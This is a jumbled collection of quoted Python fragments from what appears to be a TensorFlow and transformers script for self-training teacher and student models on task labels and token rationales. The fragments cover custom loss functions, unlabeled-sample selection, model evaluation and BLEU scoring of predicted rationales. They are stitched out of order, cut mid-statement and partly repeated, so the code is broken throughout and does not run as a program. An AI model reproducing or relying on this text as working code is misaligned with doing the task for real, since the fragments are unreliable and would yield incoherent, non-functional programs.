axis=-1))))", "1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out", "y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) 
{}\".format(task_acc)) max_task_acc", "'pruthi_' in type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0]", "y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\":", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif", "set (student model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text", "== 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task:", "y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "else: indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch =", "X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:],", "np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if", "= acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch,", "np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for", "instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = 
np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if", "[y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss", "transformers import * import logging import math import models import numpy as np", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred =", "(macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token", "import models import numpy as np import os, sys import json import nltk", "test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss", "type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val", "pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append('", "performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model 
performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1,", "in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0,", "y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE)", "set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample,", "defaultdict from sklearn.utils import shuffle from transformers import * import logging import math", "metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus,", "y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc", "X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train", "test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 =", "= out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(),", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def", "1.0, 0, 0] ''' 
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier':", "range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "* import logging import math import models import numpy as np import os,", "type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights =", "#_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if", "{\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch),", "'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1)", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif", "strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), 
loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True,", "score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0,", "y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc))", "sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None", "np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp =", "max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all", "type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {}", "np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter,", "y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev,", "[1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), 
loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "+ 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true,", "'mtl' in type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev,", "logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0]", "y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+=", "np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i,", "type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i", "X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5])", "1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test],", "1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0],", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, 
[y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_", "1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),", "None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file", "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in", "= X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0],", "best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0],", "'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task", "model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3]", "shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = 
np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1)", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))],", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test,", "'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred =", "ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in", "(macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss", "loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss,", "np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from", "np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for", "type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] =", "score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 +=", "y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], 
y_test[:,1:], y_test[:,0], np.ones(len(y_test))],", "y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat =", "#X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_)", "X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:]", "verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)),", "type_ == 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "import * import logging import math import models import numpy as np import", "max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch,", "as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if", "0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask", "X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs =", "'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 
'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample,", "logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for", "acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred", "max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best)", "[], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher", "0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test,", "lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else:", "{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y", "y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf =", "if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred", "out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score", "\".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4", "\"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], 
\"token_type_ids\": X[\"token_type_ids\"][train_size:],", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model =", "0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0,", "verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val", "tf import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa", "y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_:", "= {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:]", "np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1", "= np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment;", "0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 += 
nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0,", "best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc", "hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to", "= [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split", "= np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred,", "rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on", "== 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\":", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch)", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] =", "X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i,", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 
'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if 'focal'", "tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout,", "deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc >", "out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 =", "list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10)", "text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir,", "{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch =", "'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter ==", "r_acc = out[3], out[4], out[5] elif 'joint' in type_: out = 
model.evaluate(X_test, [y_test[:,0],", "model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info", "i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #,", "None, None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val", "logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc", "'_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with", "of devices: {}'.format(gpus)) #run the base model n times with different initialization to", "[] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0))", "= model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred =", "r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape))", "task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev,", "* (epoch + 1) else: res = 
